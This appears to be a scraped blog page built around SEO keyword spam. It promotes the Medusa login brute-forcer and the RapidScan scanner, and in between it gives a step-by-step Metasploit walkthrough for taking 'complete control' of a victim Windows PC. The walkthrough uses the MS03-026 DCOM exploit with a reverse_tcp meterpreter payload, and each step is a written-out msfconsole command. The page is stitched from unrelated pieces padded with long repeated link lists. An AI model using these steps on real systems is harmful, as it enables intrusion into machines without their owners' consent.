sábado, 29 de agosto de 2020

Medusa: A Speedy, Parallel And Modular Login Brute-forcing Tool


About Medusa
   Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application:

   Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.

   Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.

   Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

   Multiple protocols supported. Many services are currently supported (e.g. SMB, HTTP, MS-SQL, POP3, RDP, SSHv2, among others).

   See doc/medusa.html for Medusa documentation. For additional information:

Building on macOS

#getting the source
git clone https://github.com/jmk-foofus/medusa
cd medusa

#macOS dependencies
brew install freerdp
$ export FREERDP2_CFLAGS='-I/usr/local/include'
$ export FREERDP2_LIBS='-I/usr/local/lib/freerdp'

#building
./configure
make

#executing

./src/medusa
Medusa's Installation
   Medusa is already installed on Kali Linux, Parrot Security OS, BlackArch and any other Linux distros based for security pentesting purposes.

   For Debian-based distro users, open your Terminal and enter this command:
sudo apt install medusa

   For Arch Linux-based distro users, enter this command: sudo pacman -S medusa

About the author:

You might like these similar tools:
Related links

  1. Hacking Tools For Kali Linux
  2. Free Pentest Tools For Windows
  3. Hacker Tools Github
  4. Pentest Tools Kali Linux
  5. New Hack Tools
  6. What Are Hacking Tools
  7. Free Pentest Tools For Windows
  8. Hacks And Tools
  9. Hacker Tools 2020
  10. Hacking Tools Pc
  11. Hack Tool Apk No Root
  12. Hacking Tools For Windows 7
  13. Hack Tools Pc
  14. Blackhat Hacker Tools
  15. Hack Tools Github
  16. Hacking Tools For Beginners
  17. Hack Website Online Tool
  18. Computer Hacker
  19. Kik Hack Tools
  20. Pentest Box Tools Download
  21. Pentest Tools
  22. Pentest Box Tools Download
  23. Hacker Hardware Tools
  24. Hacking Tools For Mac
  25. Hack Rom Tools
  26. Hackrf Tools
  27. Pentest Box Tools Download
  28. Pentest Recon Tools
  29. Hacker Tools Hardware
  30. Hacker Tools Windows
  31. Hacker Tools Apk
  32. Hak5 Tools
  33. Hack Apps
  34. Hacker Tools
  35. Hacking Tools 2020
  36. Hacking Tools For Games
  37. Growth Hacker Tools
  38. Hacker
  39. Hacking Tools For Windows Free Download
  40. Hack Tools For Ubuntu
  41. Hacker Tools For Ios
  42. Nsa Hacker Tools
  43. Pentest Tools Download
  44. Hacking Tools For Games
  45. Pentest Tools Download
  46. Hack Tools For Ubuntu
  47. Hacks And Tools
  48. Kik Hack Tools
  49. Hacker
  50. Pentest Tools Github
  51. Usb Pentest Tools
  52. Pentest Tools For Mac
  53. Pentest Tools Port Scanner
  54. Hacking Tools Online
  55. Pentest Tools Find Subdomains
  56. Nsa Hack Tools Download
  57. Top Pentest Tools
  58. Underground Hacker Sites
  59. Tools For Hacker
  60. Pentest Tools For Android
  61. How To Hack
  62. Hacking Tools Github
  63. Hacker Tools For Ios
  64. Hack Tools 2019
  65. Pentest Tools Find Subdomains
  66. Pentest Tools Bluekeep
  67. Hack Apps
  68. Pentest Reporting Tools
  69. Hacker Search Tools
  70. Free Pentest Tools For Windows

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Related word

RapidScan: The Multi-Tool Website Vulnerabilities Scanner With Artificial Intelligence

RapidScan's Features:
  • One-step installation.
  • Executes a multitude of security scanning tools, does other custom coded checks and prints the results spontaneously.
  • Come of the tools include nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismero etc executes under one entity.
  • Saves a lot of time, indeed a lot time!
  • Checks for same vulnerabilities with multiple tools to help you zero-in on false positives effectively.
  • Legends to help you understand which tests may take longer time, so you can Ctrl+C to skip if needed.
  • Association with OWASP Top 10 2017 on the list of vulnerabilities discovered. (under development)
  • Critical, high, large, low and informational classification of vulnerabilities.
  • Vulnerability definitions guides you what the vulnerability actually is and the threat it can pose
  • Remediations tells you how to plug/fix the found vulnerability.
  • Executive summary gives you an overall context of the scan performed with critical, high, low and informational issues discovered. (under development)
  • Artificial intelligence to deploy tools automatically depending upon the issues found. for eg; automates the launch of wpscan and plecost tools when a wordpress installation is found. (under development)
  • Detailed comprehensive report in a portable document format (*.pdf) with complete details of the scans and tools used. (under development)

For Your Infomation about RapidScan:
  • Program is still under development, works and currently supports 80 vulnerability tests.
  • Parallel processing is not yet implemented, may be coded as more tests gets introduced.

RapidScan supports checking for these vulnerabilities:
  • DNS/HTTP Load Balancers & Web Application Firewalls. 
  • Checks for Joomla, WordPress and Drupal
  • SSL related Vulnerabilities (HEARTBLEED, FREAK, POODLE, CCS Injection, LOGJAM, OCSP Stapling).
  • Commonly Opened Ports.
  • DNS Zone Transfers using multiple tools (Fierce, DNSWalk, DNSRecon, DNSEnum).
  • Sub-Domains Brute Forcing.
  • Open Directory/File Brute Forcing.
  • Shallow XSS, SQLi and BSQLi Banners.
  • Slow-Loris DoS Attack, LFI (Local File Inclusion), RFI (Remote File Inclusion) & RCE (Remote Code Execution).

RapidScan's Requirements:
  • Kali Linux, Parrot Security OS, BlackArch... Linux distros that based for pentesters and hackers.
  • Python 2.7.x

RapidScan Installation:


RapidScan's screenshots:
RapidScan helping menu
RapidScan Intro
RapidScan Outro

How to contribute?
If you want to contribute to the author. Read this.

Read more


  1. Hack Tools Download
  2. Hack Website Online Tool
  3. Hak5 Tools
  4. Pentest Tools Online
  5. Hack Tools Pc
  6. Hacker Tools 2019
  7. Hacker Tools Online
  8. Hack Tools For Pc
  9. Pentest Tools List
  10. Hacker Tools 2020
  11. Free Pentest Tools For Windows
  12. How To Make Hacking Tools
  13. Underground Hacker Sites
  14. Computer Hacker
  15. Physical Pentest Tools
  16. Hacking Tools Online
  17. Hacker Tools Windows
  18. Hacker Tools
  19. Easy Hack Tools
  20. How To Make Hacking Tools
  21. Hack Tools Github
  22. What Are Hacking Tools
  23. Pentest Tools Tcp Port Scanner
  24. Nsa Hack Tools
  25. Pentest Tools Windows
  26. Pentest Tools For Mac
  27. Pentest Tools Github
  28. Tools For Hacker
  29. Hacking Tools
  30. Pentest Tools For Ubuntu
  31. Kik Hack Tools
  32. How To Hack
  33. Hack Tool Apk
  34. Hacker Tools Free
  35. Pentest Tools Nmap
  36. Pentest Tools For Windows
  37. Best Hacking Tools 2019
  38. Hack Tool Apk
  39. Bluetooth Hacking Tools Kali
  40. Best Hacking Tools 2019
  41. Hacker Tool Kit
  42. Easy Hack Tools
  43. Best Pentesting Tools 2018
  44. Hack Tools Mac
  45. Hacking Tools Name
  46. Hacker Tools For Ios
  47. Hacker Tools Github
  48. Hacking Tools And Software
  49. Hacker Tools 2019
  50. Hackers Toolbox
  51. Nsa Hack Tools Download
  52. Hacking Tools For Mac
  53. Hacker Hardware Tools
  54. How To Install Pentest Tools In Ubuntu
  55. Pentest Tools Website
  56. Best Hacking Tools 2019
  57. Hacker Search Tools
  58. Usb Pentest Tools
  59. Hacking Tools For Pc
  60. Hacking Tools For Mac
  61. Pentest Tools
  62. Hack Tools Download
  63. Pentest Recon Tools
  64. Hacker Tools For Mac
  65. Hack Tool Apk
  66. Tools 4 Hack
  67. Hacker Tools Online
  68. Game Hacking
  69. Hack Tools Online
  70. Hacker Hardware Tools
  71. Pentest Tools For Ubuntu
  72. Hacking Tools For Beginners
  73. Pentest Tools Online
  74. Hacking Tools For Beginners
  75. Pentest Tools Url Fuzzer
  76. Install Pentest Tools Ubuntu
  77. Hacking Tools Github
  78. Pentest Tools Subdomain
  79. Pentest Tools Linux
  80. Hacking Tools Online
  81. Hacker Tools List
  82. Hacking Tools Online
  83. Hacking Tools Mac
  84. Best Hacking Tools 2020
  85. Hacking Tools Windows
  86. Hacking Tools 2020
  87. Hacker Tools List
  88. Pentest Tools Framework
  89. Hacking Tools Kit
  90. Tools For Hacker
  91. Hacking Tools Download
  92. Top Pentest Tools
  93. Pentest Tools For Ubuntu
  94. Hacking Tools Usb
  95. Growth Hacker Tools
  96. Pentest Tools Apk
  97. Hack Tools Mac
  98. Hacking Tools For Kali Linux
  99. Hacking Tools Usb
  100. Hacking Tools Windows
  101. Underground Hacker Sites
  102. Nsa Hack Tools Download
  103. New Hacker Tools
  104. Hack Tools
  105. Hacking Tools
  106. Hack Tools Pc
  107. Hacking Tools Free Download
  108. Hacking Tools For Windows Free Download
  109. Pentest Reporting Tools
  110. Game Hacking
  111. Hacker
  112. Hacking Tools For Windows
  113. Hack Tools
  114. Pentest Tools Nmap
  115. Pentest Tools Github
  116. Hacking App
  117. Hacker Tools Apk
  118. Github Hacking Tools
  119. How To Install Pentest Tools In Ubuntu
  120. Hacking Tools For Kali Linux
  121. Pentest Tools Subdomain
  122. Hacker Tools Hardware
  123. Pentest Tools For Mac
  124. Usb Pentest Tools
  125. Hacker Tools Apk
  126. Hacker Tools
  127. Pentest Tools Subdomain
  128. Tools 4 Hack
  129. Hacker Tools Windows
  130. Hacking Tools For Beginners
  131. Hack Tools 2019
  132. Hack Tool Apk No Root
  133. Hack Tools
  134. Nsa Hack Tools Download
  135. Hacker Tools
  136. Hack Tools For Windows
  137. Hacker Tools Online
  138. Growth Hacker Tools
  139. Free Pentest Tools For Windows
  140. Hacking Tools For Windows 7
  141. Hacking Tools Kit
  142. Hackrf Tools
  143. Hacker Tool Kit
  144. Hacking Tools Github
  145. Hack Tools Mac
  146. What Is Hacking Tools
  147. Hack And Tools
  148. Hacker Hardware Tools
  149. Hacking Tools Online
  150. Hacker Tools
  151. Pentest Tools Github
  152. Nsa Hacker Tools
  153. New Hacker Tools
  154. Ethical Hacker Tools
  155. Pentest Tools Download
  156. Hacker Search Tools
  157. Black Hat Hacker Tools
  158. Pentest Tools Github
  159. Easy Hack Tools
  160. Hacker Tools Hardware
  161. Hack Tools Mac
  162. Pentest Tools Website
  163. Pentest Tools Tcp Port Scanner
  164. Hacking Tools 2019
  165. Hacker Tool Kit
  166. Pentest Tools Android
  167. Hacker Tools For Mac
  168. Ethical Hacker Tools
  169. Hacking Tools For Mac